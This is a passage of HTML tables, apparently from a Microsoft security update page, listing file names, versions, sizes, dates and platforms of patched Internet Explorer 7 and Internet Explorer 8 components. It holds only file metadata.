class=\"sbody-td\">7.0.6000.16414</td><td class=\"sbody-td\">983,552</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">250,368</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">57,344</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">371,712</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieudinit.exe</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">13,824</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">720,024</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">2,077,184</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">32,256</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">623,104</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">82,432</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">5,735,936</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">762,880</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msrating.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">242,688</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">1,129,984</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">164,864</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Pngfilt.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">64,000</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">108,544</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">1,441,280</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">1,104,896</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Webcheck.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">295,936</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">1,051,648</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x64</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wadvpack.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">124,928</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wcorpol.dll</td><td class=\"sbody-td\">2007.0.0.21306</td><td class=\"sbody-td\">17,408</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wdxtmsft.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">347,136</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wdxtrans.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">214,528</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wextmgr.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">132,608</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Whtml.iec</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">389,120</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wicardie.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">63,488</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wie4uinit.exe</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">70,656</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieakeng.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">153,088</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieaksie.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">230,400</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieakui.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">161,792</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieapfltr.dat</td><td class=\"sbody-td\">7.0.6011.1</td><td class=\"sbody-td\">2,452,872</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieapfltr.dll</td><td class=\"sbody-td\">7.0.6000.16730</td><td class=\"sbody-td\">380,928</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiedkcs32.dll</td><td class=\"sbody-td\">17.0.6000.21357</td><td class=\"sbody-td\">388,608</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieencode.dll</td><td class=\"sbody-td\">2017.0.0.21306</td><td class=\"sbody-td\">78,336</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieframe.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">6,108,672</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieframe.dll.mui</td><td class=\"sbody-td\">7.0.6000.16414</td><td class=\"sbody-td\">991,232</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiepeers.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiernonce.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">44,544</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiertutil.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">268,288</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wieudinit.exe</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">13,824</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wiexplore.exe</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">643,224</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Winetcpl.cpl</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">1,830,912</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wjsproxy.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">27,648</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmsfeeds.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">496,128</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmsfeedsbs.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">52,224</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtml.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">3,626,496</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmshtmled.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">480,256</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmsrating.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">193,024</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wmstime.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">671,232</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Woccache.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">102,912</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wpngfilt.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">44,544</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurl.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wurlmon.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">1,172,992</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wvgx.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wwebcheck.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">233,472</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wwininet.dll</td><td class=\"sbody-td\">7.0.6000.21357</td><td class=\"sbody-td\">841,216</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:20</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">SP2QFE\\WOW</td></tr></table></div><h3 class=\"sbody-h3\">Internet Explorer 8</h3><h4 class=\"sbody-h4\">Internet Explorer 8 on all supported 32-bit versions of Windows XP</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th><th class=\"sbody-th\">SP requirement</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2008.0.0.23532</td><td class=\"sbody-td\">18,944</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2018.0.0.23532</td><td class=\"sbody-td\">385,024</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:06</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">174,592</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">06:36</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">18.0.6001.23532</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">743,424</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">11,113,472</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">184,320</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">247,808</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">2,006,016</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,469,440</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">522,240</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Licmgr10.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">43,520</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">630,272</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">55,296</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">6,017,536</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">67,072</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">611,840</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">206,848</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">105,984</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,215,488</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">759,296</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">18:33</td><td class=\"sbody-td\">x86</td><td class=\"sbody-td\">SP3</td><td class=\"sbody-td\">SP3QFE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">920,064</td><td 